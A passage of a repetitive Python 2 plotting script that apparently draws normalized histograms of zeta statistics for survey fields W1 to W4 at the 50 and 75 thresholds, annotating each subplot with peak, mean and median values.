np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(457)\nrangemax=6\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(457)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % 
(bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 6\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=13\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(458)\nrangemax=6\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', 
linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(458)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % 
(bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 7\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=15\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(459)\nrangemax=7\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, 
bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(459)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 8\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, 
float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=17\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,11)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), 
range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,11)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{z}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 9\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=19\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % 
